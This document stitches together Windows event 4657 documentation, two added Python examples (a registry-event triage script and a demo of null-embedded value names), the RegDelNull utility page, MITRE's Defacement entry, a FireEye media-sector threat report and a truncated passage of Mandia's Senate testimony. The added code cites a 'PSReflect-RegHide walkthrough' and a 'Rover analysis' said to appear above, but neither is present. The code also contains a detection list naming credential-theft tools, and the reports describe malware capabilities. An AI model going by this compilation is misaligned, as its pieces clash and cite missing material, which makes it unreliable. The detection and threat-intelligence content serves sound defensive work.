Event Versions: 0.

Field Descriptions:

Subject:

Security ID [Type = SID]: SID of the account that requested the "modify registry value" operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security.
When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the "modify registry value" operation.

Account Domain [Type = UnicodeString]: subject's domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is "NT AUTHORITY". For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: "Win81".

Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, "4624: An account was successfully logged on."

Object:

Object Name [Type = UnicodeString]: full path and name of the registry key whose value was modified. The format is \REGISTRY\HIVE\PATH, where HIVE is one of:
HKEY_LOCAL_MACHINE = \REGISTRY\MACHINE
HKEY_CURRENT_USER = \REGISTRY\USER\[USER_SID], where [USER_SID] is the SID of the current user
HKEY_CLASSES_ROOT = \REGISTRY\MACHINE\SOFTWARE\Classes
HKEY_USERS = \REGISTRY\USER
HKEY_CURRENT_CONFIG = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\Current
and PATH is the path to the registry key.

Object Value Name [Type = UnicodeString]: the name of the modified registry key value.

Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name.
This field can help you correlate this event with other events that might contain the same Handle ID, for example, "4656: A handle to an object was requested." This parameter might not be captured in the event, and in that case appears as "0x0".

Operation Type [Type = UnicodeString]: the type of operation performed on the registry key value. The most common operations are:
New registry value created
Registry value deleted
Existing registry value modified

Process Information:

Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the registry key value was modified. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column). If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager. You can also correlate this process ID with a process ID in other events, for example, "4688: A new process has been created" Process Information\New Process ID.

Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

Change Information:

Old Value Type [Type = UnicodeString]: old type of the changed registry key value. Registry key value types:

Value Type      Description
REG_SZ          String
REG_BINARY      Binary
REG_DWORD       DWORD (32-bit) Value
REG_QWORD       QWORD (64-bit) Value
REG_MULTI_SZ    Multi-String Value
REG_EXPAND_SZ   Expandable String Value

Old Value [Type = UnicodeString]: old value of the changed registry key value.

New Value Type [Type = UnicodeString]: new type of the changed registry key value. See the table above for possible values.

New Value [Type = UnicodeString]: new value of the changed registry key value.

Security Monitoring Recommendations

For 4657(S): A registry value was modified.

Important: For this event, also see Appendix A: Security monitoring recommendations for many audit events.
If you have a pre-defined "Process Name" for the process reported in this event, monitor all events with "Process Name" not equal to your defined value.

You can monitor to see if "Process Name" is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files).

If you have a pre-defined list of restricted substrings or words in process names (for example, "mimikatz" or "cain.exe"), check for these substrings in "Process Name."

If Object Name is a sensitive or critical registry key for which you need to monitor any modification of its values, monitor all 4657 events.

If Object Name has specific values (Object Value Name) and you need to monitor modifications of these values, monitor for all 4657 events.
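The recommendations above turned into a triage routine, as an added Python example (not Microsoft's code): it parses 4657 events from the Security channel's XML layout and flags a process outside the standard folders, a restricted substring in the process name, and a write to the Run key. The first sample event is the one documented above (regedit.exe writing Name_New); the other two are constructed, one of them writing the "System Application" Run value that the Rover analysis above describes, from a binary in a temp folder. STANDARD_FOLDERS, RESTRICTED_WORDS and the RUN_KEY pattern are illustrative assumptions, not values taken from the documentation.

```python
"""Triage of 4657 "A registry value was modified" events.

Added example, not Microsoft's code. It applies the Security Monitoring
Recommendations to events parsed from the Security log's XML layout. The
folder allow-list, the restricted-word list and the Run-key pattern are
assumptions chosen for illustration.
"""
import re
from xml.etree import ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumption: folders in which registry-writing processes are expected to live.
STANDARD_FOLDERS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumption: substrings of a process name that always warrant a finding.
RESTRICTED_WORDS = ("mimikatz", "cain.exe")
# Run key under HKLM (\REGISTRY\MACHINE) or under any user hive (\REGISTRY\USER\<SID>).
RUN_KEY = re.compile(
    r"^\\REGISTRY\\(MACHINE|USER\\S-1-5-21-[\d-]+)"
    r"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run$",
    re.IGNORECASE,
)


def build_event(fields):
    """Render one 4657 event in the Security channel's XML layout (constructed sample data)."""
    data = "".join(f'<Data Name="{name}">{value}</Data>' for name, value in fields.items())
    return (
        f'<Event xmlns="{NS["e"]}"><System><EventID>4657</EventID>'
        "<Channel>Security</Channel><Computer>DC01.contoso.local</Computer></System>"
        f"<EventData>{data}</EventData></Event>"
    )


def parse_4657(xml_text):
    """Return the EventData fields of one event as a dict, with the EventID added."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    fields["EventID"] = root.findtext("e:System/e:EventID", namespaces=NS)
    return fields


def triage(event):
    """Apply the monitoring recommendations to one parsed event; return the findings."""
    findings = []
    if event.get("EventID") != "4657":
        return findings
    process = event["ProcessName"]
    if not process.lower().startswith(STANDARD_FOLDERS):
        findings.append(f"process outside standard folders: {process}")
    for word in RESTRICTED_WORDS:
        if word in process.lower():
            findings.append(f"restricted substring {word!r} in process name: {process}")
    if RUN_KEY.match(event["ObjectName"]):
        findings.append(f"Run key changed: {event['ObjectValueName']!r} = {event['NewValue']!r}")
    return findings


def report(xml_events):
    """Triage a batch of events; return (ProcessName, findings) for each event that fired."""
    results = []
    for xml_text in xml_events:
        event = parse_4657(xml_text)
        findings = triage(event)
        if findings:
            results.append((event["ProcessName"], findings))
    return results


COMMON = {
    "SubjectUserSid": "S-1-5-21-3457937927-2839227994-823803824-1104",
    "SubjectUserName": "dadmin", "SubjectDomainName": "CONTOSO", "SubjectLogonId": "0x364eb",
}
# Sample 1: the event shown in the documentation (regedit.exe writing Name_New).
EVENT_REGEDIT = build_event({
    **COMMON, "ObjectName": r"\REGISTRY\MACHINE", "ObjectValueName": "Name_New",
    "HandleId": "0x54", "OperationType": "%%1905", "OldValueType": "%%1873", "OldValue": "",
    "NewValueType": "%%1873", "NewValue": "Andrei",
    "ProcessId": "0xce4", "ProcessName": r"C:\Windows\regedit.exe",
})
# Sample 2 (constructed): a binary in a temp folder writing the Rover-style
# "System Application" Run value into the user's hive.
EVENT_RUN_KEY = build_event({
    **COMMON,
    "ObjectName": r"\REGISTRY\USER\S-1-5-21-3457937927-2839227994-823803824-1104"
                  r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "ObjectValueName": "System Application", "HandleId": "0x1a8", "OperationType": "%%1905",
    "OldValueType": "%%1873", "OldValue": "", "NewValueType": "%%1873",
    "NewValue": r"c:\system\WindowsSecurityService2.exe",
    "ProcessId": "0x9f0", "ProcessName": r"C:\Users\dadmin\AppData\Local\Temp\file.exe",
})
# Sample 3 (constructed): a process whose name carries a restricted substring.
EVENT_RESTRICTED = build_event({
    **COMMON, "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Example", "ObjectValueName": "Setting",
    "HandleId": "0x60", "OperationType": "%%1905", "OldValueType": "%%1873", "OldValue": "",
    "NewValueType": "%%1873", "NewValue": "1",
    "ProcessId": "0xb14", "ProcessName": r"C:\Windows\Temp\mimikatz.exe",
})

if __name__ == "__main__":
    for process, findings in report([EVENT_REGEDIT, EVENT_RUN_KEY, EVENT_RESTRICTED]):
        print(process)
        for finding in findings:
            print("  -", finding)
```

The documented event produces no finding: regedit.exe lives under C:\Windows and the object is not a Run key. The temp-folder write fires twice (folder and Run key), the third event once (restricted word), which is the granularity a SIEM rule would want before it is tuned against the environment's own expected writers.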
RegDelNull - Windows Sysinternals | Microsoft Docs
RegDelNull v1.11
07/04/2016, 2 minutes to read
By Mark Russinovich
Published: July 4, 2016
Download RegDelNull (152 KB)

Introduction

This command-line utility searches for and allows you to delete Registry keys that contain embedded-null characters and that are otherwise undeleteable using standard Registry-editing tools.

Note: deleting Registry keys may cause the applications they are associated with to fail.

Using RegDelNull

Usage: regdelnull <path> [-s]

Parameter   Description
-s          Recurse into subkeys.

Here's an example of RegDelNull when used on a system on which the RegHide sample program has created a null-embedded key:

    C:\>regdelnull hklm -s

    RegDelNull v1.10 - Delete Registry keys with embedded Nulls
    Copyright (C) 2005-2006 Mark Russinovich
    Sysinternals - www.sysinternals.com

    Null-embedded key (Nulls are replaced by '*'):
    HKLM\SOFTWARE\Systems Internals\Can't touch me!*
    Delete (y/n) y

    Scan complete.

Download RegDelNull (152 KB)

Runs on:
Client: Windows Vista (32-bit) and higher
Server: Windows Server 2008 (32-bit) and higher
Nano Server: 2016 and higher
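Both the PSReflect-RegHide walkthrough above and RegDelNull turn on the same detail: the native API describes a name with a UNICODE_STRING whose Length is an explicit byte count, so the name may contain U+0000, while RtlInitUnicodeString and the Win32 paths behind RegEdit and reg query stop at the first null and therefore see a different, shorter name. The following added Python example (not code from either page) models both readings side by side and shows the check a Length-honouring enumerator can apply, rendering nulls as '*' the way RegDelNull's output does. The UnicodeString class and the audit function are this example's own constructions; the two hidden names are the ones the pages show.

```python
"""Counted versus NUL-terminated views of a registry value name.

Added example, not code from the PSReflect-RegHide post or from RegDelNull.
A UNICODE_STRING carries a byte Length plus a Buffer, so a name may contain
U+0000; a consumer that stops at the first NUL sees a shorter name instead,
which is why such a value looks hidden to standard tools.
"""
from dataclasses import dataclass


@dataclass
class UnicodeString:
    """Mirror of the UNICODE_STRING layout: lengths are in bytes, Buffer is UTF-16LE."""
    length: int
    maximum_length: int
    buffer: bytes

    @classmethod
    def from_text(cls, text):
        """Build the structure the way RegHide does: Length set explicitly from the
        text, so an embedded NUL is counted rather than treated as the terminator."""
        data = text.encode("utf-16-le")
        return cls(length=len(data), maximum_length=len(data) + 2, buffer=data + b"\x00\x00")


def counted_name(value):
    """Read the name the way a Length-honouring (native API) consumer does."""
    return value.buffer[: value.length].decode("utf-16-le")


def c_string_name(value):
    """Read the name the way a NUL-terminated (Win32) consumer does: stop at the first NUL."""
    text = value.buffer.decode("utf-16-le")
    end = text.find("\x00")
    return text if end < 0 else text[:end]


def has_embedded_nul(value):
    """True when the two views disagree, i.e. the counted name contains U+0000."""
    return "\x00" in counted_name(value)


def display_name(value, marker="*"):
    """Render the counted name with NULs made visible, as RegDelNull does with '*'."""
    return counted_name(value).replace("\x00", marker)


def audit_value_names(values):
    """For each value whose two views differ, return what a Length-honouring
    enumerator sees (made printable) beside what a Win32 tool would show."""
    return [
        {"counted": display_name(v), "win32_sees": c_string_name(v)}
        for v in values
        if has_embedded_nul(v)
    ]


# Constructed sample enumeration: an ordinary Run value name, the "`0abcd" name from
# the PSReflect-RegHide walkthrough, and the "Can't touch me!" name from the RegDelNull page.
SAMPLE_VALUES = [
    UnicodeString.from_text("System Application"),
    UnicodeString.from_text("\x00abcd"),
    UnicodeString.from_text("Can't touch me!\x00"),
]

if __name__ == "__main__":
    for hit in audit_value_names(SAMPLE_VALUES):
        print(f"hidden name {hit['counted']!r}; Win32 tools see {hit['win32_sees']!r}")
```

A leading NUL, as in the RegHide value, makes the Win32 view an empty string, which is why Get-ItemProperty and reg query return nothing for it; a trailing NUL, as in the RegDelNull key, yields a name that looks normal but never matches the real one, which is why standard editors cannot open or delete it. Either way the mismatch between the two views is the detection signal.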
Defacement - Enterprise | MITRE ATT&CK™
Defacement

Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion.

Internal

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.[1] Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.[2]

External

Websites are a common victim of defacement; they are often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.[3][4][5] Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.[6]

ID: T1491
Tactic: Impact
Platform: Linux, macOS, Windows
Data Sources: Packet capture, Web application firewall logs, Web logs
Impact Type: Integrity
Version: 1.0

Mitigations

Data Backup: Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

Detection

Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.

References

[1] Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
[2] Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
[3] FireEye. (n.d.). Retrieved April 19, 2019.
[4] Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019.
[5] Andy. (2018, May 12). 'Anonymous' Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019.
[6] Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.

Copyright © 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation."
-"INDUSTRY INTELLIGENCE REPORT

CYBER THREATS TO THE ENTERTAINMENT AND MEDIA INDUSTRIES

WE HAVE OBSERVED AT LEAST 17 ADVANCED THREAT GROUPS COMPROMISE COMPANIES IN THESE SUBSECTORS:
• Entertainment & Games Software
• Diversified Entertainment
• Information Collection & Delivery
• Internet Publishing, Broadcasting & Search Portals
• Magazine Publishers
• Multimedia, Graphics & Publishing Software
• Newspaper Publishers
• Television Station Groups

ENTERTAINMENT AND MEDIA COMPANIES FACE CYBER THREATS FROM THE FOLLOWING ACTORS:
• Advanced Persistent Threat (APT)¹ groups assisting their sponsoring government in controlling its national image by stealing information related to media organizations' reporting activities, including personnel, sources, local partnerships, anticipated public releases, general country operations, and specific areas of research.
• APT groups engaging in economic espionage to provide their indigenous entertainment and media companies with a competitive advantage through stealing data related to other companies' mergers, acquisitions, or distribution; technologies or processes for advanced production; and creative intellectual property.
• Hacktivists and APT groups seeking to disrupt a victim company's operations to promote a cause, control reporting, or contain the dissemination of content that they consider politically sensitive or controversial. APT groups may potentially try to mask the identity of their government sponsor by posing as an independent hacktivist group when targeting a victim company.
• Enterprise-like cybercriminals seeking personal profit through targeting the gaming industry and stealing account credentials, activation codes, in-game valuables, and personally identifiable information (PII).

CASE STUDY: APT28 SUSPECTED IN FALSE FLAG OPERATION ON FRENCH MEDIA COMPANY

In April 2015, threat actors compromised TV5 Monde, a French news station with a global audience. The actors damaged equipment, disrupting broadcasts for several hours, and defaced the company's website and social media accounts with propaganda pertaining to ISIS and the CyberCaliphate, a hacktivist group allegedly associated with ISIS. However, although the activity initially appeared to be the work of the CyberCaliphate, FireEye Threat Intelligence suspects that APT28, a group associated with the Russian government, was instead responsible for the activity. APT28 likely posed as the CyberCaliphate to capitalize on Western fears over Islamic extremism, particularly following the Charlie Hebdo-inspired attacks of several months prior. The compromise of TV5 Monde was likely a Russian information operation intended to alarm the French, with whom Russia's relations have been declining (as with the rest of the West), and draw the West's attention away from Russia's ongoing role in the Ukraine crisis and towards the threat of terrorism in the Middle East.

¹ Advanced Persistent Threat (APT) actors are assessed to take direction from a nation state to steal information or conduct network attacks, tenaciously pursue their objectives, and are capable of using a range of tools and tactics.

THREAT HORIZON & INDUSTRY OUTLOOK

The entertainment and media industries play a key role in shaping public opinion and even national image, making them a valuable target for APT groups and hacktivists seeking influence. The following factors may further influence threat activity towards these sectors:
• Concerns over domestic stability and government legitimacy will likely result in increased targeting from APT groups seeking to assist their associated government in monitoring public opinion, shaping its image, promoting its message, and otherwise leveraging its soft power to maintain and spread its influence.
• A desire to discourage publication of controversial stories and views may prompt some threat actors to attempt to gain access to a relevant media organization's raw reporting and acquire information on the identities of its sources. State-sponsored threat actors aiming to suppress a certain story, for example, may target a media organization reporting on the topic in an effort to evaluate what the organization knows about the issue, and identify its sources.
• Efforts to intimidate or punish a media organization for publishing a critical or unflattering story might prompt the threat actors to retaliate by targeting the offending media organization. Threat actors may steal data on employees and sources in an effort to intimidate or monitor them. There is also the possibility that threat actors may try to steal and then publicly release sensitive data, in an attempt to embarrass the targeted organization and damage its credibility.
• Tensions or conflicts between adversaries, whether state or non-state, will probably lead to increased threat activity from associated threat actors aiming to prevent their adversary from spreading its own message or propaganda, while potentially seeking to spread its own propaganda through its opponents' channels.
• Increased popularity and use of social media will likely lead to continued targeting of providers and platforms by APT groups, cybercriminals, and hacktivists aiming to facilitate further targeting through social engineering, and/or promote their own views through disrupting services or defacing webpages.

MALWARE FAMILIES TOP 5
59% ChinaChopper
15% SOGU (aka Kaba)
10% Gh0stRAT
8% PoisonIvy
8% Page

CRIMEWARE FAMILIES TOP 5
35% Upatre
32% Delf
15% ZeroAccess (aka SIREFEF)
10% Allaple
8% Muxif

DATA STOLEN FROM ENTERTAINMENT & MEDIA COMPANIES
• Address Books
• Calendar Files
• Executive Communications
• Negotiations Information
• Network Infrastructure Documents
• PR and Marketing Materials
• Reporters' Communications
• User Credentials

TOP MALWARE FAMILIES

FireEye most frequently detected threat actors using the following targeted malware families to compromise organizations in the entertainment and media sectors:

ChinaChopper is a small webshell that provides threat actors unauthorized access to an information system using a simple password for authentication and is capable of executing Microsoft .NET code within HTTP POST commands.

SOGU (aka Kaba, PlugX) is a backdoor that is capable of file upload and download, arbitrary process execution, filesystem and registry access, service configuration access, remote shell access, and implementing a custom VNC/RDP-like protocol to provide the command and control (C2) server with graphical access to the desktop.

GH0STRAT is a remote access tool (RAT) derived from publicly available source code. It can perform screen and audio captures, enable a webcam, list and kill processes, open a command shell, wipe event logs, and create, manipulate, delete, launch, and transfer files.

POISONIVY is a publicly available RAT that provides comprehensive remote access capabilities on a compromised system. Its variants are configured, built, and controlled using a graphical Poison Ivy management interface available online. It can be configured to produce shellcode, which can be packaged into an executable or combined with an existing executable to hide its presence. It is typically configured to inject multiple shellcode stubs into the explorer.exe process.

Page (aka ELISE) is a downloader that attempts to retrieve encoded DLLs from a pre-configured command and control server, which it communicates with using HTTP requests. Once the DLLs are downloaded, the downloader loads them into memory. It also incorporates several source-level anti-reverse engineering functions.

TOP CRIMEWARE FAMILIES

FireEye's sinkhole and dynamically shared threat data indicate that the following crimeware variants were the most commonly detected in the entertainment and media sectors:

Upatre is a Trojan downloader that often arrives via a spam email, drive-by download or exploit. Upatre will download one or more additional types of malware onto an infected system and has been observed distributing a wide variety of malware including, but not limited to, Zbot, Dyre, Rovnix, CryptoLocker, and Necurs.

Delf is a family of Trojans whose files are often compiled in Delphi. It has the ability to connect to a remote server for downloading and installing additional malware onto the system without the consent or knowledge of the user and may also have the ability to steal sensitive information.

ZeroAccess (aka SIREFEF) is a Trojan with advanced rootkit capabilities. Initially developed as a delivery mechanism for other types of malicious software, it has been re-architected to perform click fraud.

Allaple is a worm that will perform denial of service attacks on specific targets and attempt to propagate to other systems on the same network.

Muxif is a Trojan downloader that communicates with a C2 server to send system information, receive instructions, and download additional malicious executables. It also modifies the registry to maintain persistence.

© 2016 FireEye, Inc. All rights reserved. FireEye is a registered trademark of FireEye, Inc. All other brands, products, or service names are or may be trademarks or service marks of their respective owners. IB.ENT.EN-US.052016
FireEye, Inc. 1440 McCarthy Blvd. Milpitas, CA 95035 / 408.321.6300 / 877.FIREEYE (347.3393) / info@FireEye.com www.FireEye.com"
-"Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence March 30, 2017 Thank you, Mr. Chairman, Vice-Chairman Warner, and Members of the Senate Intelligence Committee, for the opportunity you have given me today to share our observations and our experiences regarding this important topic, as well as for your leadership on cybersecurity issues. As requested, I am going to discuss three topics here today: 1) the role of overt and covert cyber operations in support of Russian active measures, disinformation, and influence campaigns; 2) the cyber capabilities and techniques attributed to Russian state and non-state actors; and 3) recommendations to prevent and mitigate the threat posed by such cyber operations. 1. Background. Before I turn to your specific questions, let me share some background on myself and my company to inform the context of my narrative. I have been working in cybersecurity for over two decades, since I was first stationed at the Pentagon at the outset of my career as a Computer Security Officer in 1993. During my time investigating computer intrusions while I was in the Air Force, I came to recognize that the biggest cyber threats to our infrastructure were intrusions from other countries, most notably Russia and China. I founded Mandiant in 2004 to create a company with that could effectively respond to these threats and innovate technologies to help detect and respond to advanced attacks. Fast forward a few years, Mandiant was bought by FireEye, and I became FireEye\xe2\x80\x99s CEO last June in 2016. As I testify today, FireEye employees are on the front lines of the cyber battle, responding to active computer intrusions at dozens of the largest companies and organizations on a global scale, including incidents in cyber \xe2\x80\x9chot zones\xe2\x80\x9d such as the Middle East and Southeast Asia. 
Over the last 13 years, we have responded to incidents at hundreds of companies around the world. During that time, we have investigated millions of systems, and we receive calls almost every single day from organizations that have suffered a cybersecurity breach. In addition to the 300-plus security professionals responding to computer intrusions, FireEye has over 150 cyber-threat analysts on staff in 19 countries and speaking 32 different languages, to help us predict threats and better understand the adversary \xe2\x80\x93 often by considering the political and cultural environment of the threat actors. We have an enormous catalog of threat intelligence, and it continues to grow everyday coincident with the continually increasing attacks on organizations around the world. The information I will share today, then, is derived from our experiences responding to computer security breaches, as well as intelligence derived from our experienced team of cyber threat analysts and collected from more than 5000 customers who use our products to detect intrusions into their networks and respond to these attacks. 2. The Role of Overt and Covert Cyber Operations in Support of Russian Active Measures, Disinformation, and Influence Campaigns. The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the report, \xe2\x80\x9cAPT1: Exposing One of China\xe2\x80\x99s Cyber Espionage Units,\xe2\x80\x9d which detailed a professional cyber espionage group based in China. 1 Several months later in 2014 we released another report, this time regarding Russian cyber activities, entitled, \xe2\x80\x9cAPT28: A Window into Russia\xe2\x80\x99s Cyber Espionage Operations?\xe2\x80\x9d2 In that report, FireEye identified APT28 as a suspected Russian government-sponsored espionage actor, basing our conclusion on forensic details left in the malware employed since at least 2007. 
Since release of the initial report on APT28, we have continued to gather intelligence and collect data on the group\xe2\x80\x99s activities, and most recently, in January of this year, released \xe2\x80\x9cAPT28: At the Center of the Storm\xe2\x80\x9d3 which provides additional detail on the continued evolution of Russian cyber operations. As shown in our most recent report, an analysis of the activities of APT28 indicates the group\xe2\x80\x99s interest in foreign governments and militaries, particularly those of Europe, as well as regional security organizations. In addition, our research indicates that APT28 network activity has likely supported information operations designed to influence the domestic politics of foreign nations. We provide an extensive listing of targets including the World Anti-Doping Agency (WADA), the U.S. Democratic National Committee, Mr. John Podesta, the U.S. Democratic Congressional Campaign Committee (DCCC), as well as TV5Monde and the Ukrainian Central Election Commission (CEC). All of these breaches involved the theft of internal data \xe2\x80\x93 mostly emails \xe2\x80\x93 that was later strategically leaked through multiple forums and propagated in a manner almost certainly intended to advance particular Russian Government goals. We noted that the combination of network compromises and subsequent data leaks align closely with the Russian military\xe2\x80\x99s publicly stated intentions and capabilities. Russian strategic doctrine has for a long time included what the West terms \xe2\x80\x98information 1 https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf. 2 https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt- apt28.pdf. 3 https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf. operations\xe2\x80\x99 which have been further developed, deployed and modernized. 
The recent activity in the United States is one of many instances of such operations conducted in support of Russian political objectives. I note that our conclusions were consistent with the U.S. Office of the Director of National Intelligence report released on January 7, 2017 in which this activity is described as \xe2\x80\x9can influence campaign.\xe2\x80\x9d4 3. Cyber Capabilities and Techniques Attributed to Russian State and Non- State Actors So how was this done, and why do we assess that the Russian government was likely behind this activity? Let me first speak to the methodologies used. During the course of our APT28 investigations, we analyzed over 550 customer malware variants, identified approximately 500 domains, over 70 lure documents and dozens of spear phishing emails to help us understand their tools, techniques, and procedures. We find that APT28 continues to evolve its toolkit and refine its tactics in an effort to maintain its operational effectiveness in the face of heightened public exposure and scrutiny. In addition to the continued evolution of the group's first- stage tools, we have also noted that APT28 is: 1 - Leveraging at least five zero-day vulnerabilities in Adobe Flash Player, Java, and Windows in 2015 alone, including CVE-2015-1701, CVE-2015-2424, CVE-2015-2590, CVE-2015-3043, CVE-2016-7193, and CVE-2015-7645. 2 \xe2\x80\x93 Increasing its reliance on public code depositories, such as Carberp, PowerShell Empire, P.A.S. webshell, Metasploit modules, and others in a likely effort to accelerate their development cycle and provide plausible deniability. 3 - Obtaining credentials through fabricated Google App authorization and Oauth access requests that allow the group to bypass two-factor authentication (2FA) and other security measures, and 4 - Moving laterally through a network relying only on legitimate tools that already exist within victims' systems, at times forgoing their traditional toolset for the duration of the compromise. 
Over the past two years we have witnessed an escalation of APT 28\xe2\x80\x99s overall activities and one notable change in its rules of engagement. Specifically, since 2014 we have seen APT28 in many instances compromise a victim organization, steal information, and subsequently leak the stolen data into the public. Many of these leaks have been conducted through the use of \xe2\x80\x9cfalse hacktivist personas\xe2\x80\x9d, including, among others, \xe2\x80\x9cCyberCaliphate\xe2\x80\x9d, \xe2\x80\x9cGuccifer 2.0\xe2\x80\x9d, \xe2\x80\x9cDC Leaks\xe2\x80\x9d, \xe2\x80\x9cAnonymous Poland\xe2\x80\x9d, and \xe2\x80\x9cFancy Bears\xe2\x80\x99 Hack Team\xe2\x80\x9d. These \xe2\x80\x9cpersonas\xe2\x80\x9d appropriated pre-existing hacktivist or political brands likely to obfuscate their true identify, provide plausible deniability, and to create the perception of credibility. 4 https://www.intelligence.senate.gov/sites/default/files/documents/ICA 2017 01.pdf. Although we can link the collection activity to APT28, we have not been able to establish whether the APT28 operators themselves directly control the false personas that then leak material or if that responsibility instead resides with a separate entity. However, we do see similar patterns in infrastructure procurement between APT28 and some personas to suggest they played at least some role. For example, we believe that the actors behind the DCLeaks persona attempted to register the domain \xe2\x80\x9celectionleaks.com\xe2\x80\x9d one-week prior to \xe2\x80\x9cDCLeaks.com\xe2\x80\x9d in April 2016 \xe2\x80\x93 approximately two months prior to the first election-related leaks. These domains were registered using the service provider we have seen APT28 frequently use in the past to support cyber attacks. Thus, our intelligence indicates that APT28 likely operated with the knowledge that the data they stole during cyber intrusions would leverage these domains for public exposure of the data. 
I include the following timeline and analysis to illustrate the use of these techniques over the last few years. In June of 2014, Ukrainian officials revealed the investigation into the compromise of the Ukrainian Central Election Commission (CEC) internal network identified custom malware traced to APT28. During the May 2014 Ukrainian presidential election, purported pro-Russian hacktivists \xe2\x80\x9cCyberBerkut\xe2\x80\x9d conducted a series of malicious activities against the CEC, including a system compromise, data destruction, a data leak, a distributed denial-of- service (DDoS) attack, and an attempted defacement of the CEC website with fake election results. In February of 2015, FireEye identified APT28 (CORESHELL) traffic beaconing from TV5Monde's network, revealing APT28 had compromised TV5Monde's network. In April 2015, alleged pro-ISIS hacktivist group CyberCaliphate defaced TV5Monde's websites and social media profiles and forced the company's 11 broadcast channels offline. We identified overlaps between the domain registration details of CyberCaliphate's website and APT28 infrastructure. In July of 2016, the U.S. Democratic Congressional Campaign Committee (DCCC) announced that it was investigating an ongoing ""cybersecurity incident"" that the FBI believed was linked to the compromise of the DNC. House Speaker Nancy Pelosi later confirmed that the DCCC had suffered a network compromise. Investigators indicated that the actors may have gained access to DCCC systems as early as March. In August, the Guccifer 2.0 persona contacted reporters covering the U.S. House of Representative races to announce newly leaked documents from the DCCC pertaining to Democratic candidates. From August to October, Guccifer 2.0 posted several additional installments of what appear to be internal DCCC documents on its WordPress site. 
Between March and October of 2016, investigators found that John Podesta, Hillary Clinton's presidential campaign chairman, was one of thousands of individuals targeted in a mass phishing scheme using shortened URLs that security researchers attributed to APT28. Throughout October and into early November, WikiLeaks published 34 batches of email correspondence stolen from Mr. Podesta's personal email account. Correspondence of other individuals targeted in the same phishing campaign, including former Secretary of State Colin Powell and Clinton campaign staffer William Rinehart, were published on the ""DC Leaks"" website. In April through September, 2016, the U.S. Democratic National Committee (DNC) suffered a network compromise and a subsequent investigation found evidence of two breaches, attributed to APT28 and APT29. FireEye analyzed the malware found on DNC networks and determined that it was consistent with our previous observations of APT28 tools. In June 2016, shortly after the DNC's public announcement about the breach, the Guccifer 2.0 persona claimed responsibility for the DNC breach and leaked documents taken from the organization's network. Guccifer 2.0 continued to leak DNC documents through September of 2016. And finally, in September of 2016, WADA confirmed that APT28 had compromised its networks and accessed athlete medical data. On Sept. 12, 2016, the ""Fancy 'Bears' Hack Team"" persona claimed to have compromised WADA and released athletes' medical records as ""proof of American athletes taking doping."" Let me now turn to explaining why we assess that the Russian government was likely behind this activity. In order to make such an assessment, we reviewed and compared intrusion methodologies and tools, malware or authored exploits and use of shared personnel. 
